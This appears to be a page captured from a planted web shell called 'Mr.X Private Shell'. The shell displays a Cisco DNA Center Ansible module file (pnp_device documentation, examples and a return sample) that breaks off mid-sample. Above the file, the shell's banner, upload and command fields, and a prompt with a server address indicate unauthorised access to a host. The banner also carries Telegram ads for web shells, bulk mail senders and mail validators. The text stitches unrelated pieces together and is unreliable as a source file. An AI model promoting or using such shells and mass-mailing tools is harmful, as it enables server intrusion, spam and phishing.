����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
# -*- coding: utf-8 -*-

# Copyright (c) 2021, Cisco Systems
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)

DOCUMENTATION = r"""
---
module: pnp_device
short_description: Resource module for Pnp Device
description:
- Manage operations create, update and delete of the resource Pnp Device.
- Adds a device to the PnP database.
- Deletes specified device from PnP database.
- Updates device details specified by device id in PnP database.
version_added: '3.1.0'
extends_documentation_fragment:
  - cisco.dnac.module
author: Rafael Campos (@racampos)
options:
  _id:
    description: Pnp Device's _id.
    type: str
  deviceInfo:
    description: Pnp Device's deviceInfo.
    suboptions:
      aaaCredentials:
        description: Pnp Device's aaaCredentials.
        suboptions:
          password:
            description: Pnp Device's password.
            type: str
          username:
            description: Pnp Device's username.
            type: str
        type: dict
      addedOn:
        description: Pnp Device's addedOn.
        type: int
      addnMacAddrs:
        description: Pnp Device's addnMacAddrs.
        elements: str
        type: list
      agentType:
        description: Pnp Device's agentType.
        type: str
      authStatus:
        description: Pnp Device's authStatus.
        type: str
      authenticatedSudiSerialNo:
        description: Pnp Device's authenticatedSudiSerialNo.
        type: str
      capabilitiesSupported:
        description: Pnp Device's capabilitiesSupported.
        elements: str
        type: list
      cmState:
        description: Pnp Device's cmState.
        type: str
      description:
        description: Pnp Device's description.
        type: str
      deviceSudiSerialNos:
        description: Pnp Device's deviceSudiSerialNos.
        elements: str
        type: list
      deviceType:
        description: Pnp Device's deviceType.
        type: str
      featuresSupported:
        description: Pnp Device's featuresSupported.
        elements: str
        type: list
      fileSystemList:
        description: Pnp Device's fileSystemList.
        elements: dict
        suboptions:
          freespace:
            description: Pnp Device's freespace.
            type: int
          name:
            description: Pnp Device's name.
            type: str
          readable:
            description: Readable flag.
            type: bool
          size:
            description: Pnp Device's size.
            type: int
          type:
            description: Pnp Device's type.
            type: str
          writeable:
            description: Writeable flag.
            type: bool
        type: list
      firstContact:
        description: Pnp Device's firstContact.
        type: int
      hostname:
        description: Pnp Device's hostname.
        type: str
      httpHeaders:
        description: Pnp Device's httpHeaders.
        elements: dict
        suboptions:
          key:
            description: Pnp Device's key.
            type: str
          value:
            description: Pnp Device's value.
            type: str
        type: list
      imageFile:
        description: Pnp Device's imageFile.
        type: str
      imageVersion:
        description: Pnp Device's imageVersion.
        type: str
      ipInterfaces:
        description: Pnp Device's ipInterfaces.
        elements: dict
        suboptions:
          ipv4Address:
            description: Pnp Device's ipv4Address.
            type: dict
          ipv6AddressList:
            description: Pnp Device's ipv6AddressList.
            elements: dict
            type: list
          macAddress:
            description: Pnp Device's macAddress.
            type: str
          name:
            description: Pnp Device's name.
            type: str
          status:
            description: Pnp Device's status.
            type: str
        type: list
      lastContact:
        description: Pnp Device's lastContact.
        type: int
      lastSyncTime:
        description: Pnp Device's lastSyncTime.
        type: int
      lastUpdateOn:
        description: Pnp Device's lastUpdateOn.
        type: int
      location:
        description: Pnp Device's location.
        suboptions:
          address:
            description: Pnp Device's address.
            type: str
          altitude:
            description: Pnp Device's altitude.
            type: str
          latitude:
            description: Pnp Device's latitude.
            type: str
          longitude:
            description: Pnp Device's longitude.
            type: str
          siteId:
            description: Pnp Device's siteId.
            type: str
        type: dict
      macAddress:
        description: Pnp Device's macAddress.
        type: str
      mode:
        description: Pnp Device's mode.
        type: str
      name:
        description: Pnp Device's name.
        type: str
      neighborLinks:
        description: Pnp Device's neighborLinks.
        elements: dict
        suboptions:
          localInterfaceName:
            description: Pnp Device's localInterfaceName.
            type: str
          localMacAddress:
            description: Pnp Device's localMacAddress.
            type: str
          localShortInterfaceName:
            description: Pnp Device's localShortInterfaceName.
            type: str
          remoteDeviceName:
            description: Pnp Device's remoteDeviceName.
            type: str
          remoteInterfaceName:
            description: Pnp Device's remoteInterfaceName.
            type: str
          remoteMacAddress:
            description: Pnp Device's remoteMacAddress.
            type: str
          remotePlatform:
            description: Pnp Device's remotePlatform.
            type: str
          remoteShortInterfaceName:
            description: Pnp Device's remoteShortInterfaceName.
            type: str
          remoteVersion:
            description: Pnp Device's remoteVersion.
            type: str
        type: list
      onbState:
        description: Pnp Device's onbState.
        type: str
      pid:
        description: Pnp Device's pid.
        type: str
      pnpProfileList:
        description: Pnp Device's pnpProfileList.
        elements: dict
        suboptions:
          createdBy:
            description: Pnp Device's createdBy.
            type: str
          discoveryCreated:
            description: DiscoveryCreated flag.
            type: bool
          primaryEndpoint:
            description: Pnp Device's primaryEndpoint.
            suboptions:
              certificate:
                description: Pnp Device's certificate.
                type: str
              fqdn:
                description: Pnp Device's fqdn.
                type: str
              ipv4Address:
                description: Pnp Device's ipv4Address.
                type: dict
              ipv6Address:
                description: Pnp Device's ipv6Address.
                type: dict
              port:
                description: Pnp Device's port.
                type: int
              protocol:
                description: Pnp Device's protocol.
                type: str
            type: dict
          profileName:
            description: Pnp Device's profileName.
            type: str
          secondaryEndpoint:
            description: Pnp Device's secondaryEndpoint.
            suboptions:
              certificate:
                description: Pnp Device's certificate.
                type: str
              fqdn:
                description: Pnp Device's fqdn.
                type: str
              ipv4Address:
                description: Pnp Device's ipv4Address.
                type: dict
              ipv6Address:
                description: Pnp Device's ipv6Address.
                type: dict
              port:
                description: Pnp Device's port.
                type: int
              protocol:
                description: Pnp Device's protocol.
                type: str
            type: dict
        type: list
      populateInventory:
        description: PopulateInventory flag.
        type: bool
      preWorkflowCliOuputs:
        description: Pnp Device's preWorkflowCliOuputs.
        elements: dict
        suboptions:
          cli:
            description: Pnp Device's cli.
            type: str
          cliOutput:
            description: Pnp Device's cliOutput.
            type: str
        type: list
      projectId:
        description: Pnp Device's projectId.
        type: str
      projectName:
        description: Pnp Device's projectName.
        type: str
      reloadRequested:
        description: ReloadRequested flag.
        type: bool
      serialNumber:
        description: Pnp Device's serialNumber.
        type: str
      smartAccountId:
        description: Pnp Device's smartAccountId.
        type: str
      source:
        description: Pnp Device's source.
        type: str
      stack:
        description: Stack flag.
        type: bool
      stackInfo:
        description: Pnp Device's stackInfo.
        suboptions:
          isFullRing:
            description: IsFullRing flag.
            type: bool
          stackMemberList:
            description: Pnp Device's stackMemberList.
            elements: dict
            suboptions:
              hardwareVersion:
                description: Pnp Device's hardwareVersion.
                type: str
              licenseLevel:
                description: Pnp Device's licenseLevel.
                type: str
              licenseType:
                description: Pnp Device's licenseType.
                type: str
              macAddress:
                description: Pnp Device's macAddress.
                type: str
              pid:
                description: Pnp Device's pid.
                type: str
              priority:
                description: Pnp Device's priority.
                type: int
              role:
                description: Pnp Device's role.
                type: str
              serialNumber:
                description: Pnp Device's serialNumber.
                type: str
              softwareVersion:
                description: Pnp Device's softwareVersion.
                type: str
              stackNumber:
                description: Pnp Device's stackNumber.
                type: int
              state:
                description: Pnp Device's state.
                type: str
              sudiSerialNumber:
                description: Pnp Device's sudiSerialNumber.
                type: str
            type: list
          stackRingProtocol:
            description: Pnp Device's stackRingProtocol.
            type: str
          supportsStackWorkflows:
            description: SupportsStackWorkflows flag.
            type: bool
          totalMemberCount:
            description: Pnp Device's totalMemberCount.
            type: int
          validLicenseLevels:
            description: Pnp Device's validLicenseLevels.
            elements: str
            type: list
        type: dict
      state:
        description: Pnp Device's state.
        type: str
      sudiRequired:
        description: SudiRequired flag.
        type: bool
      tags:
        description: Pnp Device's tags.
        type: dict
      userSudiSerialNos:
        description: Pnp Device's userSudiSerialNos.
        elements: str
        type: list
      virtualAccountId:
        description: Pnp Device's virtualAccountId.
        type: str
      workflowId:
        description: Pnp Device's workflowId.
        type: str
      workflowName:
        description: Pnp Device's workflowName.
        type: str
    type: dict
  id:
    description: Id path parameter.
    type: str
  runSummaryList:
    description: Pnp Device's runSummaryList.
    elements: dict
    suboptions:
      details:
        description: Pnp Device's details.
        type: str
      errorFlag:
        description: ErrorFlag flag.
        type: bool
      historyTaskInfo:
        description: Pnp Device's historyTaskInfo.
        suboptions:
          addnDetails:
            description: Pnp Device's addnDetails.
            elements: dict
            suboptions:
              key:
                description: Pnp Device's key.
                type: str
              value:
                description: Pnp Device's value.
                type: str
            type: list
          name:
            description: Pnp Device's name.
            type: str
          timeTaken:
            description: Pnp Device's timeTaken.
            type: int
          type:
            description: Pnp Device's type.
            type: str
          workItemList:
            description: Pnp Device's workItemList.
            elements: dict
            suboptions:
              command:
                description: Pnp Device's command.
                type: str
              endTime:
                description: Pnp Device's endTime.
                type: int
              outputStr:
                description: Pnp Device's outputStr.
                type: str
              startTime:
                description: Pnp Device's startTime.
                type: int
              state:
                description: Pnp Device's state.
                type: str
              timeTaken:
                description: Pnp Device's timeTaken.
                type: int
            type: list
        type: dict
      timestamp:
        description: Pnp Device's timestamp.
        type: int
    type: list
  systemResetWorkflow:
    description: Pnp Device's systemResetWorkflow.
    suboptions:
      _id:
        description: Pnp Device's _id.
        type: str
      addToInventory:
        description: AddToInventory flag.
        type: bool
      addedOn:
        description: Pnp Device's addedOn.
        type: int
      configId:
        description: Pnp Device's configId.
        type: str
      currTaskIdx:
        description: Pnp Device's currTaskIdx.
        type: int
      description:
        description: Pnp Device's description.
        type: str
      endTime:
        description: Pnp Device's endTime.
        type: int
      execTime:
        description: Pnp Device's execTime.
        type: int
      imageId:
        description: Pnp Device's imageId.
        type: str
      instanceType:
        description: Pnp Device's instanceType.
        type: str
      lastupdateOn:
        description: Pnp Device's lastupdateOn.
        type: int
      name:
        description: Pnp Device's name.
        type: str
      startTime:
        description: Pnp Device's startTime.
        type: int
      state:
        description: Pnp Device's state.
        type: str
      tasks:
        description: Pnp Device's tasks.
        elements: dict
        suboptions:
          currWorkItemIdx:
            description: Pnp Device's currWorkItemIdx.
            type: int
          endTime:
            description: Pnp Device's endTime.
            type: int
          name:
            description: Pnp Device's name.
            type: str
          startTime:
            description: Pnp Device's startTime.
            type: int
          state:
            description: Pnp Device's state.
            type: str
          taskSeqNo:
            description: Pnp Device's taskSeqNo.
            type: int
          timeTaken:
            description: Pnp Device's timeTaken.
            type: int
          type:
            description: Pnp Device's type.
            type: str
          workItemList:
            description: Pnp Device's workItemList.
            elements: dict
            suboptions:
              command:
                description: Pnp Device's command.
                type: str
              endTime:
                description: Pnp Device's endTime.
                type: int
              outputStr:
                description: Pnp Device's outputStr.
                type: str
              startTime:
                description: Pnp Device's startTime.
                type: int
              state:
                description: Pnp Device's state.
                type: str
              timeTaken:
                description: Pnp Device's timeTaken.
                type: int
            type: list
        type: list
      tenantId:
        description: Pnp Device's tenantId.
        type: str
      type:
        description: Pnp Device's type.
        type: str
      useState:
        description: Pnp Device's useState.
        type: str
      version:
        description: Pnp Device's version.
        type: int
    type: dict
  systemWorkflow:
    description: Pnp Device's systemWorkflow.
    suboptions:
      _id:
        description: Pnp Device's _id.
        type: str
      addToInventory:
        description: AddToInventory flag.
        type: bool
      addedOn:
        description: Pnp Device's addedOn.
        type: int
      configId:
        description: Pnp Device's configId.
        type: str
      currTaskIdx:
        description: Pnp Device's currTaskIdx.
        type: int
      description:
        description: Pnp Device's description.
        type: str
      endTime:
        description: Pnp Device's endTime.
        type: int
      execTime:
        description: Pnp Device's execTime.
        type: int
      imageId:
        description: Pnp Device's imageId.
        type: str
      instanceType:
        description: Pnp Device's instanceType.
        type: str
      lastupdateOn:
        description: Pnp Device's lastupdateOn.
        type: int
      name:
        description: Pnp Device's name.
        type: str
      startTime:
        description: Pnp Device's startTime.
        type: int
      state:
        description: Pnp Device's state.
        type: str
      tasks:
        description: Pnp Device's tasks.
        elements: dict
        suboptions:
          currWorkItemIdx:
            description: Pnp Device's currWorkItemIdx.
            type: int
          endTime:
            description: Pnp Device's endTime.
            type: int
          name:
            description: Pnp Device's name.
            type: str
          startTime:
            description: Pnp Device's startTime.
            type: int
          state:
            description: Pnp Device's state.
            type: str
          taskSeqNo:
            description: Pnp Device's taskSeqNo.
            type: int
          timeTaken:
            description: Pnp Device's timeTaken.
            type: int
          type:
            description: Pnp Device's type.
            type: str
          workItemList:
            description: Pnp Device's workItemList.
            elements: dict
            suboptions:
              command:
                description: Pnp Device's command.
                type: str
              endTime:
                description: Pnp Device's endTime.
                type: int
              outputStr:
                description: Pnp Device's outputStr.
                type: str
              startTime:
                description: Pnp Device's startTime.
                type: int
              state:
                description: Pnp Device's state.
                type: str
              timeTaken:
                description: Pnp Device's timeTaken.
                type: int
            type: list
        type: list
      tenantId:
        description: Pnp Device's tenantId.
        type: str
      type:
        description: Pnp Device's type.
        type: str
      useState:
        description: Pnp Device's useState.
        type: str
      version:
        description: Pnp Device's version.
        type: int
    type: dict
  tenantId:
    description: Pnp Device's tenantId.
    type: str
  version:
    description: Pnp Device's version.
    type: int
  workflow:
    description: Pnp Device's workflow.
    suboptions:
      _id:
        description: Pnp Device's _id.
        type: str
      addToInventory:
        description: AddToInventory flag.
        type: bool
      addedOn:
        description: Pnp Device's addedOn.
        type: int
      configId:
        description: Pnp Device's configId.
        type: str
      currTaskIdx:
        description: Pnp Device's currTaskIdx.
        type: int
      description:
        description: Pnp Device's description.
        type: str
      endTime:
        description: Pnp Device's endTime.
        type: int
      execTime:
        description: Pnp Device's execTime.
        type: int
      imageId:
        description: Pnp Device's imageId.
        type: str
      instanceType:
        description: Pnp Device's instanceType.
        type: str
      lastupdateOn:
        description: Pnp Device's lastupdateOn.
        type: int
      name:
        description: Pnp Device's name.
        type: str
      startTime:
        description: Pnp Device's startTime.
        type: int
      state:
        description: Pnp Device's state.
        type: str
      tasks:
        description: Pnp Device's tasks.
        elements: dict
        suboptions:
          currWorkItemIdx:
            description: Pnp Device's currWorkItemIdx.
            type: int
          endTime:
            description: Pnp Device's endTime.
            type: int
          name:
            description: Pnp Device's name.
            type: str
          startTime:
            description: Pnp Device's startTime.
            type: int
          state:
            description: Pnp Device's state.
            type: str
          taskSeqNo:
            description: Pnp Device's taskSeqNo.
            type: int
          timeTaken:
            description: Pnp Device's timeTaken.
            type: int
          type:
            description: Pnp Device's type.
            type: str
          workItemList:
            description: Pnp Device's workItemList.
            elements: dict
            suboptions:
              command:
                description: Pnp Device's command.
                type: str
              endTime:
                description: Pnp Device's endTime.
                type: int
              outputStr:
                description: Pnp Device's outputStr.
                type: str
              startTime:
                description: Pnp Device's startTime.
                type: int
              state:
                description: Pnp Device's state.
                type: str
              timeTaken:
                description: Pnp Device's timeTaken.
                type: int
            type: list
        type: list
      tenantId:
        description: Pnp Device's tenantId.
        type: str
      type:
        description: Pnp Device's type.
        type: str
      useState:
        description: Pnp Device's useState.
        type: str
      version:
        description: Pnp Device's version.
        type: int
    type: dict
  workflowParameters:
    description: Pnp Device's workflowParameters.
    suboptions:
      configList:
        description: Pnp Device's configList.
        elements: dict
        suboptions:
          configId:
            description: Pnp Device's configId.
            type: str
          configParameters:
            description: Pnp Device's configParameters.
            elements: dict
            suboptions:
              key:
                description: Pnp Device's key.
                type: str
              value:
                description: Pnp Device's value.
                type: str
            type: list
        type: list
      licenseLevel:
        description: Pnp Device's licenseLevel.
        type: str
      licenseType:
        description: Pnp Device's licenseType.
        type: str
      topOfStackSerialNumber:
        description: Pnp Device's topOfStackSerialNumber.
        type: str
    type: dict
requirements:
- dnacentersdk >= 2.5.5
- python >= 3.5
seealso:
- name: Cisco DNA Center documentation for Device Onboarding (PnP) AddDevice
  description: Complete reference of the AddDevice API.
  link: https://developer.cisco.com/docs/dna-center/#!add-device-2
- name: Cisco DNA Center documentation for Device Onboarding (PnP) DeleteDeviceByIdFromPnP
  description: Complete reference of the DeleteDeviceByIdFromPnP API.
  link: https://developer.cisco.com/docs/dna-center/#!delete-device-by-id-from-pn-p
- name: Cisco DNA Center documentation for Device Onboarding (PnP) UpdateDevice
  description: Complete reference of the UpdateDevice API.
  link: https://developer.cisco.com/docs/dna-center/#!update-device
notes:
  - SDK Method used are
    device_onboarding_pnp.DeviceOnboardingPnp.add_device,
    device_onboarding_pnp.DeviceOnboardingPnp.delete_device_by_id_from_pnp,
    device_onboarding_pnp.DeviceOnboardingPnp.update_device,

  - Paths used are
    post /dna/intent/api/v1/onboarding/pnp-device,
    delete /dna/intent/api/v1/onboarding/pnp-device/{id},
    put /dna/intent/api/v1/onboarding/pnp-device/{id},

"""

EXAMPLES = r"""
- name: Create
  cisco.dnac.pnp_device:
    dnac_host: "{{dnac_host}}"
    dnac_username: "{{dnac_username}}"
    dnac_password: "{{dnac_password}}"
    dnac_verify: "{{dnac_verify}}"
    dnac_port: "{{dnac_port}}"
    dnac_version: "{{dnac_version}}"
    dnac_debug: "{{dnac_debug}}"
    state: present
    _id: string
    deviceInfo:
      aaaCredentials:
        password: string
        username: string
      addedOn: 0
      addnMacAddrs:
      - string
      agentType: string
      authStatus: string
      authenticatedSudiSerialNo: string
      capabilitiesSupported:
      - string
      cmState: string
      description: string
      deviceSudiSerialNos:
      - string
      deviceType: string
      featuresSupported:
      - string
      fileSystemList:
      - freespace: 0
        name: string
        readable: true
        size: 0
        type: string
        writeable: true
      firstContact: 0
      hostname: string
      httpHeaders:
      - key: string
        value: string
      imageFile: string
      imageVersion: string
      ipInterfaces:
      - ipv4Address: {}
        ipv6AddressList:
        - {}
        macAddress: string
        name: string
        status: string
      lastContact: 0
      lastSyncTime: 0
      lastUpdateOn: 0
      location:
        address: string
        altitude: string
        latitude: string
        longitude: string
        siteId: string
      macAddress: string
      mode: string
      name: string
      neighborLinks:
      - localInterfaceName: string
        localMacAddress: string
        localShortInterfaceName: string
        remoteDeviceName: string
        remoteInterfaceName: string
        remoteMacAddress: string
        remotePlatform: string
        remoteShortInterfaceName: string
        remoteVersion: string
      onbState: string
      pid: string
      pnpProfileList:
      - createdBy: string
        discoveryCreated: true
        primaryEndpoint:
          certificate: string
          fqdn: string
          ipv4Address: {}
          ipv6Address: {}
          port: 0
          protocol: string
        profileName: string
        secondaryEndpoint:
          certificate: string
          fqdn: string
          ipv4Address: {}
          ipv6Address: {}
          port: 0
          protocol: string
      populateInventory: true
      preWorkflowCliOuputs:
      - cli: string
        cliOutput: string
      projectId: string
      projectName: string
      reloadRequested: true
      serialNumber: string
      smartAccountId: string
      source: string
      stack: true
      stackInfo:
        isFullRing: true
        stackMemberList:
        - hardwareVersion: string
          licenseLevel: string
          licenseType: string
          macAddress: string
          pid: string
          priority: 0
          role: string
          serialNumber: string
          softwareVersion: string
          stackNumber: 0
          state: string
          sudiSerialNumber: string
        stackRingProtocol: string
        supportsStackWorkflows: true
        totalMemberCount: 0
        validLicenseLevels:
        - string
      state: string
      sudiRequired: true
      tags: {}
      userSudiSerialNos:
      - string
      virtualAccountId: string
      workflowId: string
      workflowName: string
    runSummaryList:
    - details: string
      errorFlag: true
      historyTaskInfo:
        addnDetails:
        - key: string
          value: string
        name: string
        timeTaken: 0
        type: string
        workItemList:
        - command: string
          endTime: 0
          outputStr: string
          startTime: 0
          state: string
          timeTaken: 0
      timestamp: 0
    systemResetWorkflow:
      _id: string
      addToInventory: true
      addedOn: 0
      configId: string
      currTaskIdx: 0
      description: string
      endTime: 0
      execTime: 0
      imageId: string
      instanceType: string
      lastupdateOn: 0
      name: string
      startTime: 0
      state: string
      tasks:
      - currWorkItemIdx: 0
        endTime: 0
        name: string
        startTime: 0
        state: string
        taskSeqNo: 0
        timeTaken: 0
        type: string
        workItemList:
        - command: string
          endTime: 0
          outputStr: string
          startTime: 0
          state: string
          timeTaken: 0
      tenantId: string
      type: string
      useState: string
      version: 0
    systemWorkflow:
      _id: string
      addToInventory: true
      addedOn: 0
      configId: string
      currTaskIdx: 0
      description: string
      endTime: 0
      execTime: 0
      imageId: string
      instanceType: string
      lastupdateOn: 0
      name: string
      startTime: 0
      state: string
      tasks:
      - currWorkItemIdx: 0
        endTime: 0
        name: string
        startTime: 0
        state: string
        taskSeqNo: 0
        timeTaken: 0
        type: string
        workItemList:
        - command: string
          endTime: 0
          outputStr: string
          startTime: 0
          state: string
          timeTaken: 0
      tenantId: string
      type: string
      useState: string
      version: 0
    tenantId: string
    version: 0
    workflow:
      _id: string
      addToInventory: true
      addedOn: 0
      configId: string
      currTaskIdx: 0
      description: string
      endTime: 0
      execTime: 0
      imageId: string
      instanceType: string
      lastupdateOn: 0
      name: string
      startTime: 0
      state: string
      tasks:
      - currWorkItemIdx: 0
        endTime: 0
        name: string
        startTime: 0
        state: string
        taskSeqNo: 0
        timeTaken: 0
        type: string
        workItemList:
        - command: string
          endTime: 0
          outputStr: string
          startTime: 0
          state: string
          timeTaken: 0
      tenantId: string
      type: string
      useState: string
      version: 0
    workflowParameters:
      configList:
      - configId: string
        configParameters:
        - key: string
          value: string
      licenseLevel: string
      licenseType: string
      topOfStackSerialNumber: string

- name: Update by id
  cisco.dnac.pnp_device:
    dnac_host: "{{dnac_host}}"
    dnac_username: "{{dnac_username}}"
    dnac_password: "{{dnac_password}}"
    dnac_verify: "{{dnac_verify}}"
    dnac_port: "{{dnac_port}}"
    dnac_version: "{{dnac_version}}"
    dnac_debug: "{{dnac_debug}}"
    state: present
    _id: string
    deviceInfo:
      aaaCredentials:
        password: string
        username: string
      addedOn: 0
      addnMacAddrs:
      - string
      agentType: string
      authStatus: string
      authenticatedSudiSerialNo: string
      capabilitiesSupported:
      - string
      cmState: string
      description: string
      deviceSudiSerialNos:
      - string
      deviceType: string
      featuresSupported:
      - string
      fileSystemList:
      - freespace: 0
        name: string
        readable: true
        size: 0
        type: string
        writeable: true
      firstContact: 0
      hostname: string
      httpHeaders:
      - key: string
        value: string
      imageFile: string
      imageVersion: string
      ipInterfaces:
      - ipv4Address: {}
        ipv6AddressList:
        - {}
        macAddress: string
        name: string
        status: string
      lastContact: 0
      lastSyncTime: 0
      lastUpdateOn: 0
      location:
        address: string
        altitude: string
        latitude: string
        longitude: string
        siteId: string
      macAddress: string
      mode: string
      name: string
      neighborLinks:
      - localInterfaceName: string
        localMacAddress: string
        localShortInterfaceName: string
        remoteDeviceName: string
        remoteInterfaceName: string
        remoteMacAddress: string
        remotePlatform: string
        remoteShortInterfaceName: string
        remoteVersion: string
      onbState: string
      pid: string
      pnpProfileList:
      - createdBy: string
        discoveryCreated: true
        primaryEndpoint:
          certificate: string
          fqdn: string
          ipv4Address: {}
          ipv6Address: {}
          port: 0
          protocol: string
        profileName: string
        secondaryEndpoint:
          certificate: string
          fqdn: string
          ipv4Address: {}
          ipv6Address: {}
          port: 0
          protocol: string
      populateInventory: true
      preWorkflowCliOuputs:
      - cli: string
        cliOutput: string
      projectId: string
      projectName: string
      reloadRequested: true
      serialNumber: string
      smartAccountId: string
      source: string
      stack: true
      stackInfo:
        isFullRing: true
        stackMemberList:
        - hardwareVersion: string
          licenseLevel: string
          licenseType: string
          macAddress: string
          pid: string
          priority: 0
          role: string
          serialNumber: string
          softwareVersion: string
          stackNumber: 0
          state: string
          sudiSerialNumber: string
        stackRingProtocol: string
        supportsStackWorkflows: true
        totalMemberCount: 0
        validLicenseLevels:
        - string
      state: string
      sudiRequired: true
      tags: {}
      userSudiSerialNos:
      - string
      virtualAccountId: string
      workflowId: string
      workflowName: string
    id: string
    runSummaryList:
    - details: string
      errorFlag: true
      historyTaskInfo:
        addnDetails:
        - key: string
          value: string
        name: string
        timeTaken: 0
        type: string
        workItemList:
        - command: string
          endTime: 0
          outputStr: string
          startTime: 0
          state: string
          timeTaken: 0
      timestamp: 0
    systemResetWorkflow:
      _id: string
      addToInventory: true
      addedOn: 0
      configId: string
      currTaskIdx: 0
      description: string
      endTime: 0
      execTime: 0
      imageId: string
      instanceType: string
      lastupdateOn: 0
      name: string
      startTime: 0
      state: string
      tasks:
      - currWorkItemIdx: 0
        endTime: 0
        name: string
        startTime: 0
        state: string
        taskSeqNo: 0
        timeTaken: 0
        type: string
        workItemList:
        - command: string
          endTime: 0
          outputStr: string
          startTime: 0
          state: string
          timeTaken: 0
      tenantId: string
      type: string
      useState: string
      version: 0
    systemWorkflow:
      _id: string
      addToInventory: true
      addedOn: 0
      configId: string
      currTaskIdx: 0
      description: string
      endTime: 0
      execTime: 0
      imageId: string
      instanceType: string
      lastupdateOn: 0
      name: string
      startTime: 0
      state: string
      tasks:
      - currWorkItemIdx: 0
        endTime: 0
        name: string
        startTime: 0
        state: string
        taskSeqNo: 0
        timeTaken: 0
        type: string
        workItemList:
        - command: string
          endTime: 0
          outputStr: string
          startTime: 0
          state: string
          timeTaken: 0
      tenantId: string
      type: string
      useState: string
      version: 0
    tenantId: string
    version: 0
    workflow:
      _id: string
      addToInventory: true
      addedOn: 0
      configId: string
      currTaskIdx: 0
      description: string
      endTime: 0
      execTime: 0
      imageId: string
      instanceType: string
      lastupdateOn: 0
      name: string
      startTime: 0
      state: string
      tasks:
      - currWorkItemIdx: 0
        endTime: 0
        name: string
        startTime: 0
        state: string
        taskSeqNo: 0
        timeTaken: 0
        type: string
        workItemList:
        - command: string
          endTime: 0
          outputStr: string
          startTime: 0
          state: string
          timeTaken: 0
      tenantId: string
      type: string
      useState: string
      version: 0
    workflowParameters:
      configList:
      - configId: string
        configParameters:
        - key: string
          value: string
      licenseLevel: string
      licenseType: string
      topOfStackSerialNumber: string

- name: Delete by id
  cisco.dnac.pnp_device:
    dnac_host: "{{dnac_host}}"
    dnac_username: "{{dnac_username}}"
    dnac_password: "{{dnac_password}}"
    dnac_verify: "{{dnac_verify}}"
    dnac_port: "{{dnac_port}}"
    dnac_version: "{{dnac_version}}"
    dnac_debug: "{{dnac_debug}}"
    state: absent
    id: string

"""

RETURN = r"""
dnac_response:
  description: A dictionary or list with the response returned by the Cisco DNAC Python SDK
  returned: always
  type: dict
  sample: >
    {
      "_id": "string",
      "deviceInfo": {
        "source": "string",
        "serialNumber": "string",
        "stack": true,
        "mode": "string",
        "state": "string",
        "location": {
          "siteId": "string",
          "address": "string",
          "latitude": "string",
          "longitude": "string",
          "altitude": "string"
        },
        "description": "string",
        "onbState": "string",
        "authenticatedMicNumber": "string",
        "authenticatedSudiSerialNo": "string",
        "capabilitiesSupported": [
          "string"
        ],
        "featuresSupported": [
          "string"
        ],
        "cmState": "string",
        "firstContact": 0,
        "lastContact": 0,
        "macAddress": "string",
        "pid": "string",
        "deviceSudiSerialNos": [
          "string"
        ],
        "lastUpdateOn": 0,
        "workflowId": "string",
        "workflowName": "string",
        "projectId": "string",
        "projectName": "string",
        "deviceType": "string",
        "agentType": "string",
        "imageVersion": "string",
        "fileSystemList": [
          {
            "type": "string",
            "writeable": true,
            "freespace": 0,
            "name": "string",
            "readable": true,
            "size": 0
          }
        ],
        "pnpProfileList": [
          {
            "profileName": "string",
            "discoveryCreated": true,
            "createdBy": "string",
            "primaryEndpoint": {
              "port": 0,
              "protocol": "string",
              "ipv4Address": {},
              "ipv6Address": {},
              "fqdn": "string",
              "certificate": "string"
            },
            "secondaryEndpoint": {
              "port": 0,
              "protocol": "string",
              "ipv4Address": {},
              "ipv6Address": {},
              "fqdn": "string",
              "certificate": "string"
            }
          }
        ],
        "imageFile": "string",
        "httpHeaders": [
          {
            "key": "string",
            "value": "string"
          }
        ],
        "neighborLinks": [
          {
            "localInterfaceName": "string",
            "localShortInterfaceName": "string",
            "localMacAddress": "string",
            "remoteInterfaceName": "string",
            "remoteShortInterfaceName": "string",
            "remoteMacAddress": "string",
            "remoteDeviceName": "string",
            "remotePlatform": "string",
            "remoteVersion": "string"
          }
        ],
        "lastSyncTime": 0,
        "ipInterfaces": [
          {
            "status": "string",
            "macAddress": "string",
            "ipv4Address": {},
            "ipv6AddressList": [
              {}
            ],
            "name": "string"
          }
        ],
        "hostname": "string",
        "authStatus": "string",
        "stackInfo": {
          "supportsStackWorkflows": true,
          "isFullRing": true,
          "stackMemberList": [
            {
              "serialNumber": "string",
              "state": "string",
              "role": "string",
              "macAddress": "string",
              "pid": "string",
              "licenseLevel": "string",
              "licenseType": "string",
              "sudiSerialNumber": "string",
              "hardwareVersion": "string",
              "stackNumber": 0,
              "softwareVersion": "string",
              "priority": 0
            }
          ],
          "stackRingProtocol": "string",
          "validLicenseLevels": [
            "string"
          ],
          "totalMemberCount": 0
        },
        "reloadRequested": true,
        "addedOn": 0,
        "siteId": "string",
        "aaaCredentials": {
          "password": "string",
          "username": "string"
        },
        "userMicNumbers": [
          "string"
        ],
        "userSudiSerialNos": [
          "string"
        ],
        "addnMacAddrs": [
          "string"
        ],
        "preWorkflowCliOuputs": [
          {
            "cli": "string",
            "cliOutput": "string"
          }
        ],
        "tags": {},
        "sudiRequired": true,
        "smartAccountId": "string",
        "virtualAccountId": "string",
        "populateInventory": true,
        "siteName": "string",
        "name": "string"
      },
      "systemResetWorkflow": {
        "_id": "string",
        "state": "string",
        "type": "string",
        "description": "string",
        "lastupdateOn": 0,
        "imageId": "string",
        "currTaskIdx": 0,
        "addedOn": 0,
        "tasks": [
          {
            "state": "string",
            "type": "string",
            "currWorkItemIdx": 0,
            "taskSeqNo": 0,
            "endTime": 0,
            "startTime": 0,
            "workItemList": [
              {
                "state": "string",
                "command": "string",
                "outputStr": "string",
                "endTime": 0,
                "startTime": 0,
                "timeTaken": 0
              }
            ],
